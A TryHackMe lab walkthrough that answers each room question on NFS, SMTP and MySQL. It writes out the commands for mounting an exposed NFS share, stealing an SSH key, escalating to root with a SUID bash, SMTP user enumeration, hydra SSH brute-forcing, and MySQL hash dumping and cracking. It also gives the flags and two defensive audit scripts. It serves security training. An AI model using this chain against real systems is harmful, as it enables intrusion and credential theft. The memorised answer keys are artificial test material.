【TryHackMe】Network Services 2:Walkthrough


Overview

This is a walkthrough of the TryHackMe room "Network Services 2".

Task2

Q1.What does NFS stand for?

A.Network File System

Q2.What process allows an NFS client to interact with a remote directory as though it was a physical device?

Hint.What does your Operating System do to access a physical drive?

A.Mounting

Q3.What does NFS use to represent files and directories on the server?

A.file handle

Q4.What protocol does NFS use to communicate between the server and client?

A.RPC

Q5.What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2

A.user id / group id

Q6.Can a Windows NFS server share files with a Linux client? (Y/N)

A.Y

Q7.Can a Linux NFS server share files with a MacOS client? (Y/N)

A.Y

Q8.What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.

A.4.2

Task3

Q1.Conduct a thorough port scan scan of your choosing, how many ports are open?

Run a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.229.85 -oN nmap_result
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 73:92:8e:04:de:40:fb:9c:90:f9:cf:42:70:c8:45:a7 (RSA)
|   256 6d:63:d6:b8:0a:67:fd:86:f1:22:30:2b:2d:27:1e:ff (ECDSA)
|_  256 bd:08:97:79:63:0f:80:7c:7f:e8:50:dc:59:cf:39:5e (ED25519)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      38529/tcp   mountd
|   100005  1,2,3      45200/udp   mountd
|   100005  1,2,3      46042/udp6  mountd
|   100005  1,2,3      51499/tcp6  mountd
|   100021  1,3,4      36336/udp   nlockmgr
|   100021  1,3,4      37271/tcp   nlockmgr
|   100021  1,3,4      41253/tcp6  nlockmgr
|   100021  1,3,4      59498/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs      3-4 (RPC #100003)
37271/tcp open  nlockmgr 1-4 (RPC #100021)
38529/tcp open  mountd   1-3 (RPC #100005)
55955/tcp open  mountd   1-3 (RPC #100005)
57137/tcp open  mountd   1-3 (RPC #100005)

A.7

Q2.Which port contains the service we're looking to enumerate?

A.2049

Q3.Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

Enumerate the NFS share names.

$ showmount -e 10.10.229.85
Export list for 10.10.229.85:
/home *

A./home

Q4.Then, use the mount command we broke down earlier to mount the NFS share to your local machine. Change directory to where you mounted the share- what is the name of the folder inside?

Create a directory under /tmp and mount the share there.

$ mkdir /tmp/mount

$ sudo mount 10.10.229.85:/home /tmp/mount

$ ls -la /tmp/mount     
total 12
drwxr-xr-x  3 root root 4096 Apr 21  2020 .
drwxrwxrwt 14 root root 4096 Nov  7 03:21 ..
drwxr-xr-x  5 kali kali 4096 Jun  4  2020 cappucino

A.cappucino

Q6.Interesting! Let's do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?

Found /home/cappucino/.ssh.

$ ls -la .ssh/                
total 20
drwx------ 2 kali kali 4096 Apr 22  2020 .
drwxr-xr-x 5 kali kali 4096 Jun  4  2020 ..
-rw------- 1 kali kali  399 Apr 22  2020 authorized_keys
-rw------- 1 kali kali 1679 Apr 22  2020 id_rsa
-rw-r--r-- 1 kali kali  399 Apr 22  2020 id_rsa.pub

A..ssh

Q7.Which of these keys is most useful to us?

Hint.What is the default name of an SSH identity file?

The SSH private key was obtained from id_rsa.

A.id_rsa

Q8.Can we log into the machine using ssh -i @ ? (Y/N)

The SSH connection as cappucino succeeded.

$ ssh -i id_rsa cappucino@10.10.229.85
cappucino@polonfs:~$

A.Y

Task4

Q3.Now, we're going to add the SUID bit permission to the bash executable we just copied to the share using "sudo chmod +[permission] bash". What letter do we use to set the SUID bit set using chmod?

Copy /bin/bash to the local machine.

$ scp -i id_rsa cappucino@10.10.92.181:/bin/bash .

Copy bash onto the NFS share.

$ cp ~/Network-Services-2/bash ./

Set the owner to root.

$ sudo chown root bash

$ ls -la
total 1124
drwxr-xr-x 5 kali kali    4096 Nov  7 08:16 .
drwxr-xr-x 3 root root    4096 Apr 21  2020 ..
-rwxr-xr-x 1 root kali 1113504 Nov  7 08:16 bash

Set the SUID bit on bash.

$ sudo chmod +s bash

A.s

Q4.Let's do a sanity check, let's check the permissions of the "bash" executable using "ls -la bash". What does the permission set look like? Make sure that it ends with -sr-x.

After running the commands up to this point, the permissions look like this:

$ ls -la
total 1124
drwxr-xr-x 5 kali kali    4096 Nov  7 08:16 .
drwxr-xr-x 3 root root    4096 Apr 21  2020 ..
-rwsr-sr-x 1 root kali 1113504 Nov  7 08:16 bash

A.-rwsr-sr-x

Q6.Great! If all's gone well you should have a shell as root! What's the root flag?

Log in over SSH and confirm that the bash binary with the SUID bit set is there.

$ ssh -i ~/Network-Services-2/id_rsa cappucino@10.10.92.181

cappucino@polonfs:~$ ls -la
total 1124
drwxr-xr-x 5 cappucino cappucino    4096 Nov  7 13:16 .
drwxr-xr-x 3 root      root         4096 Apr 21  2020 ..
-rwsr-sr-x 1 root      cappucino 1113504 Nov  7 13:16 bash

Running it with the -p option escalated to root privileges.

$ ./bash -p
bash-4.4# whoami
root

The flag was obtained from /root/root.txt.

/root/root.txt
THM{nfs_got_pwned}

A.THM{nfs_got_pwned}
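The Task4 steps work only because the server honours the client's uid 0 (the `no_root_squash` export option) on a share exported to every host (`/home *`). The following audit of an exports(5) file for those settings is an added example, not part of the original walkthrough; the sample lines and the finding names are constructed, since the room's real /etc/exports is not shown on the page.

```python
import re
import shlex

# Constructed sample; the room's real /etc/exports is not shown on the page.
SAMPLE_EXPORTS = """\
/home        *(rw,sync,no_root_squash,no_subtree_check)
/srv/backup  192.0.2.10(ro,sync) 192.0.2.0/24(rw,sync,insecure)
/srv/pub     (ro,all_squash)    # no host before the parenthesis: every host
/srv/build   -rw,no_root_squash buildhost.example
"""

CLIENT_RE = re.compile(r"^(?P<host>[^()]*)(?:\((?P<opts>[^()]*)\))?$")


def parse_exports(text):
    """Yield (path, client, options) for each client entry in exports(5) text."""
    for raw in text.replace("\\\n", " ").splitlines():   # join continuation lines
        line = raw.split("#", 1)[0].strip()              # drop comments
        if not line:
            continue
        path, *rest = shlex.split(line)
        defaults = []
        for tok in rest:
            if tok.startswith("-"):                      # "-opt,opt" sets defaults
                defaults = tok[1:].split(",")
                continue
            m = CLIENT_RE.match(tok)
            if m:
                own = [o for o in (m["opts"] or "").split(",") if o]
                yield path, m["host"], defaults + own


def effective(opts):
    """Resolve the options this audit cares about; later options win."""
    state = {"rw": False, "root_squash": True, "secure": True}  # exports(5) defaults
    for o in opts:
        if o in ("rw", "ro"):
            state["rw"] = o == "rw"
        elif o in ("root_squash", "no_root_squash"):
            state["root_squash"] = o == "root_squash"
        elif o in ("secure", "insecure"):
            state["secure"] = o == "secure"
    return state


def audit(text):
    """Return (path, client, finding) tuples for risky export entries."""
    findings = []
    for path, client, opts in parse_exports(text):
        s = effective(opts)
        world = client in ("", "*")
        name = client or "*"
        if world:
            findings.append((path, name, "WORLD"))            # any host may mount
        if not s["root_squash"]:
            findings.append((path, name, "NO_ROOT_SQUASH"))   # client uid 0 stays root
        if world and s["rw"]:
            findings.append((path, name, "WORLD_RW"))
        if not s["secure"]:
            findings.append((path, name, "INSECURE_PORT"))    # unprivileged source ports
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_EXPORTS):
        print(*finding)
```

`showmount -e` reports only the export path and client list, not the squash options, so this check has to run against the server's own /etc/exports.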

Task5

Q1.What does SMTP stand for?

A.Simple Mail Transfer Protocol

Q2.What does SMTP handle the sending of? (answer in plural)

A.emails

Q3.What is the first step in the SMTP process?

A.SMTP handshake

Q4.What is the default SMTP port?

A.25

Q5.Where does the SMTP server send the email if the recipient's server is not available?

A.smtp queue

Q6.On what server does the Email ultimately end up on?

A.POP/IMAP

Q7.Can a Linux machine run an SMTP server? (Y/N)

A.Y

Q8.Can a Windows machine run an SMTP server? (Y/N)

A.Y

Task6

Q1.First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?

Run a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.72.20 -oN nmap_result2
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 62:a7:03:13:39:08:5a:07:80:1a:e5:27:ee:9b:22:5d (RSA)
|   256 89:d0:40:92:15:09:39:70:17:6e:c5:de:5b:59:ee:cb (ECDSA)
|_  256 56:7c:d0:c4:95:2b:77:dd:53:d6:e6:73:99:24:f6:86 (ED25519)
25/tcp    open     smtp    Postfix smtpd
| ssl-cert: Subject: commonName=polosmtp
| Subject Alternative Name: DNS:polosmtp
| Not valid before: 2020-04-22T18:38:06
|_Not valid after:  2030-04-20T18:38:06
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: polosmtp.home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8

A.25

Q2.Okay, now we know what port we should be targeting, let's start up Metasploit. What command do we use to do this?

Start Metasploit with the msfconsole command.

A.msfconsole

Q3.Let's search for the module "smtp_version", what's it's full module name?

Search for the module.

msf6 > search smtp_version

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/smtp/smtp_version  .                normal  No     SMTP Banner Grabber


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_version

A.auxiliary/scanner/smtp/smtp_version

Q4.Great, now- select the module and list the options. How do we do this?

Select the module and check its options.

msf6 > use 0
msf6 auxiliary(scanner/smtp/smtp_version) > options

Module options (auxiliary/scanner/smtp/smtp_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/us
                                       ing-metasploit.html
   RPORT    25               yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

A.options

Q5.Have a look through the options, does everything seem correct? What is the option we need to set?

RPORT and THREADS have default values; RHOSTS needs to be set.

A.RHOSTS

Q6.Set that to the correct value for your target machine. Then run the exploit. What's the system mail name?

Hint.What looks roughly like the end of an E-Mail address?

Run the module and check the result.

msf6 auxiliary(scanner/smtp/smtp_version) > exploit

[+] 10.10.72.20:25        - 10.10.72.20:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
[*] 10.10.72.20:25        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

A.polosmtp.home

Q7.What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

Hint.If I want to send a letter to my friend I have to **** it.

The module output shows that postfix is in use.

A.postfix

Q8.Good! We've now got a good amount of information on the target system to move onto the next stage. Let's search for the module "smtp_enum", what's it's full module name?

Search for the module with smtp_enum.

msf6 auxiliary(scanner/smtp/smtp_version) > search smtp_enum

Matching Modules
================

   #  Name                              Disclosure Date  Rank    Check  Description
   -  ----                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/smtp/smtp_enum  .                normal  No     SMTP User Enumeration Utility

A.auxiliary/scanner/smtp/smtp_enum

Q9.What option do we need to set to the wordlist's path?

Check the module's options.

msf6 auxiliary(scanner/smtp/smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                     Required  Description
   ----       ---------------                     --------  -----------
   RHOSTS                                         yes       The target host(s), see https://docs.metasploit.com/docs/using
                                                            -metasploit/basics/using-metasploit.html
   RPORT      25                                  yes       The target port (TCP)
   THREADS    1                                   yes       The number of concurrent threads (max one per host)
   UNIXONLY   true                                yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /usr/share/metasploit-framework/da  yes       The file that contains a list of probable users accounts.
              ta/wordlists/unix_users.txt

Set the SecLists top-usernames-shortlist.txt wordlist file.

msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/seclists/Usernames/top-usernames-shortlist.txt

A.USER_FILE

Q10.Once we've set this option, what is the other essential paramater we need to set?

Set the RHOSTS option.

msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.72.20

A.RHOSTS

Q12.Okay! Now that's finished, what username is returned?

Run the module.

msf6 auxiliary(scanner/smtp/smtp_enum) > exploit

[*] 10.10.72.20:25        - 10.10.72.20:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
[+] 10.10.72.20:25        - 10.10.72.20:25 Users found: administrator
[*] 10.10.72.20:25        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

A.administrator

Task7

Q1.What is the password of the user we found during our enumeration stage?

Identify administrator's SSH password with hydra.

$ hydra -f -l administrator -P /usr/share/wordlists/rockyou.txt 10.10.72.20 ssh -t 16
[22][ssh] host: 10.10.72.20   login: administrator   password: alejandro

A.alejandro

Q2.Great! Now, let's SSH into the server as the user, what is contents of smtp.txt

Connect over SSH as administrator and check the text file.

$ ssh administrator@10.10.72.20

administrator@polosmtp:~$ cat smtp.txt 
THM{who_knew_email_servers_were_c00l?}

A.THM{who_knew_email_servers_were_c00l?}

Task8

Q1.What type of software is MySQL?

A.relational database management system

Q2.What language is MySQL based on?

A.SQL

Q3.What communication model does MySQL use?

A.client-server

Q4.What is a common application of MySQL?

A.back end database

Q5.What major social network uses MySQL as their back-end database? This will require further research.

Hint.Who was involved in the Cambridge Analytica scandal?

A.Facebook

Task9

Q1.As always, let's start out with a port scan, so we know what port the service we're trying to attack is running on. What port is MySQL using?

Run a port scan.

PORT      STATE    SERVICE         VERSION
22/tcp    open     ssh             OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:36:56:2f:f0:d4:a4:d2:ab:6a:43:3e:c0:f9:9b:2d (RSA)
|   256 30:bd:be:28:bd:32:dc:f6:ff:28:b2:57:57:31:d9:cf (ECDSA)
|_  256 f2:3b:82:4a:5c:d2:18:19:89:1f:cd:92:0a:c7:cf:65 (ED25519)
3306/tcp  open     mysql           MySQL 5.7.29-0ubuntu0.18.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.29-0ubuntu0.18.04.1
|   Thread ID: 5
|   Capabilities flags: 65535
|   Some Capabilities: SupportsLoadDataLocal, Support41Auth, Speaks41ProtocolOld, ConnectWithDatabase, SwitchToSSLAfterHandshake, ODBCClient, Speaks41ProtocolNew, SupportsTransactions, IgnoreSigpipes, SupportsCompression, LongPassword, IgnoreSpaceBeforeParenthesis, FoundRows, LongColumnFlag, InteractiveClient, DontAllowDatabaseTableColumn, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: pH\x07@\x198na,Y*\x11J\x11K`.=[/
|_  Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.29_Auto_Generated_Server_Certificate
| Not valid before: 2020-04-23T10:13:27
|_Not valid after:  2030-04-21T10:13:27
|_ssl-date: TLS randomness does not represent time

A.3306

Q4.Search for, select and list the options it needs. What three options do we need to set? (in descending order).

Hint.Each option name is separated by a /

Start Metasploit and search for the module with mysql_sql.

msf6 > search mysql_sql

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/admin/mysql/mysql_sql  .                normal  No     MySQL SQL Generic Query

msf6 > use 0
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST

msf6 auxiliary(admin/mysql/mysql_sql) > show options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name  Current Setting   Required  Description
   ----  ---------------   --------  -----------
   SQL   select version()  yes       The SQL to execute.


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
                                        sing-metasploit.html
   RPORT     3306             no        The target port (TCP)
   USERNAME                   no        The username to authenticate as

A.PASSWORD/RHOSTS/USERNAME

Q5.Run the exploit. By default it will test with the "select version()" command, what result does this give you?

Run the module and retrieve the version information.

msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.9.192

[*] 10.10.9.192:3306 - Sending statement: 'select version()'...
[*] 10.10.9.192:3306 -  | 5.7.29-0ubuntu0.18.04.1 |
[*] Auxiliary module execution completed

A.5.7.29-0ubuntu0.18.04.1

Q6.Great! We know that our exploit is landing as planned. Let's try to gain some more ambitious information. Change the "sql" option to "show databases". how many databases are returned?

Change the statement in the SQL option.

msf6 auxiliary(admin/mysql/mysql_sql) > set sql show databases
sql => show databases

The list of databases was retrieved.

msf6 auxiliary(admin/mysql/mysql_sql) > exploit
[*] Running module against 10.10.9.192

[*] 10.10.9.192:3306 - Sending statement: 'show databases'...
[*] 10.10.9.192:3306 -  | information_schema |
[*] 10.10.9.192:3306 -  | mysql |
[*] 10.10.9.192:3306 -  | performance_schema |
[*] 10.10.9.192:3306 -  | sys |
[*] Auxiliary module execution completed

A.4

Task10

Q1.First, let's search for and select the "mysql_schemadump" module. What's the module's full name?

Search for mysql_schemadump in Metasploit.

msf6 auxiliary(admin/mysql/mysql_sql) > search mysql_schemadump

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_schemadump  .                normal  No     MYSQL Schema Dump

A.auxiliary/scanner/mysql/mysql_schemadump

Q2.Great! Now, you've done this a few times by now so I'll let you take it from here. Set the relevant options, run the exploit. What's the name of the last table that gets dumped?

Set the module's options.

msf6 auxiliary(scanner/mysql/mysql_schemadump) > show options

Module options (auxiliary/scanner/mysql/mysql_schemadump):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DISPLAY_RESULTS  true             yes       Display the Results to the Screen


   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.10.9.192      no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
                                        sing-metasploit.html
   RPORT     3306             no        The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  root             no        The username to authenticate as

Run the module and retrieve the database information.

msf6 auxiliary(scanner/mysql/mysql_schemadump) > exploit
- DBName: sys

(omitted)

  - TableName: x$waits_global_by_latency
    Columns:
    - ColumnName: events
      ColumnType: varchar(128)
    - ColumnName: total
      ColumnType: bigint(20) unsigned
    - ColumnName: total_latency
      ColumnType: bigint(20) unsigned
    - ColumnName: avg_latency
      ColumnType: bigint(20) unsigned
    - ColumnName: max_latency
      ColumnType: bigint(20) unsigned

A.x$waits_global_by_latency

Q3.Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better... search for and select the "mysql_hashdump" module. What's the module's full name?

Search for the module with mysql_hashdump.

msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_hashdump  .                normal  No     MYSQL Password Hashdump
   1  auxiliary/analyze/crack_databases       .                normal  No     Password Cracker: Databases
   2    \_ action: hashcat                    .                .       .      Use Hashcat
   3    \_ action: john                       .                .       .      Use John the Ripper

A.auxiliary/scanner/mysql/mysql_hashdump

Q4.Again, I'll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?

Set the module's options.

msf6 auxiliary(scanner/mysql/mysql_hashdump) > show options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on


   Used when making a new connection via RHOSTS:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  password         no        The password for the specified username
   RHOSTS    10.10.9.192      no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/u
                                        sing-metasploit.html
   RPORT     3306             no        The target port (TCP)
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  root             no        The username to authenticate as

Ran the module and retrieved the list of users.

msf6 auxiliary(scanner/mysql/mysql_hashdump) > exploit

[+] 10.10.9.192:3306 - Saving HashString as Loot: root:
[+] 10.10.9.192:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.9.192:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.9.192:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.10.9.192:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.10.9.192:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[*] 10.10.9.192:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

A.carl

Q5.What is the user/hash combination string?

Hint.Remember to input the whole hash string, like: carl:(HASHDATA)*

A.*carl:EA031893AA21444B170FC2162A56978B8CEECE18

Q6.Now, we need to crack the password! Let's try John the Ripper against it using: "john hash.txt" what is the password of the user we found?

Crack carl's hash.

$ john carl_hash --wordlist=/usr/share/wordlists/rockyou.txt
doggie           (carl)

A.doggie

Q7.What's the contents of MySQL.txt

Connect to the target server over SSH as the carl account and check the contents of MySQL.txt.

$ ssh carl@10.10.9.192

carl@polomysql:~$ cat MySQL.txt 
THM{congratulations_you_got_the_mySQL_flag}

A.THM{congratulations_you_got_the_mySQL_flag}
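The hash strings dumped in Task10 are in the mysql_native_password format (shown as the auth plugin in the Task9 scan): `*` followed by the uppercase hex of SHA1(SHA1(password)), with no salt, which is why a single wordlist pass recovers them. The following password audit over hashdump-style lines is an added example, not part of the original walkthrough; the `DUMP` lines are copied from the output above, while `DENYLIST`, the status names and the function names are assumptions made for illustration.

```python
import hashlib
import re
from collections import defaultdict

# user:hash lines copied from the mysql_hashdump output above.
DUMP = """\
root:
mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
carl:*EA031893AA21444B170FC2162A56978B8CEECE18
"""

# Hypothetical deny-list; in practice load your organisation's banned passwords.
DENYLIST = ["123456", "password", "doggie", "letmein"]

NATIVE_RE = re.compile(r"^\*[0-9A-F]{40}$")


def native_hash(password):
    """mysql_native_password: '*' + HEX(SHA1(SHA1(password))), unsalted."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def rows(dump):
    """Split 'user:hash' lines into (user, digest) pairs."""
    for line in dump.splitlines():
        if line.strip():
            user, _, digest = line.strip().partition(":")
            yield user, digest


def audit(dump, denylist=DENYLIST):
    """Return (user, status, matched_password) for every account row."""
    lookup = {native_hash(p): p for p in denylist}
    report = []
    for user, digest in rows(dump):
        if digest == "":
            # Empty string: no password, or a non-password plugin; check the plugin column.
            report.append((user, "EMPTY", None))
        elif not NATIVE_RE.match(digest):
            # Not 40 hex digits: a placeholder no password can hash to.
            report.append((user, "UNUSABLE", None))
        elif digest in lookup:
            report.append((user, "WEAK", lookup[digest]))
        else:
            report.append((user, "HASHED", None))
    return report


def reused(dump):
    """Accounts sharing one digest share one password: visible because there is no salt."""
    by_digest = defaultdict(list)
    for user, digest in rows(dump):
        if NATIVE_RE.match(digest):
            by_digest[digest].append(user)
    return {d: u for d, u in by_digest.items() if len(u) > 1}


if __name__ == "__main__":
    for row in audit(DUMP):
        print(*row)
```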
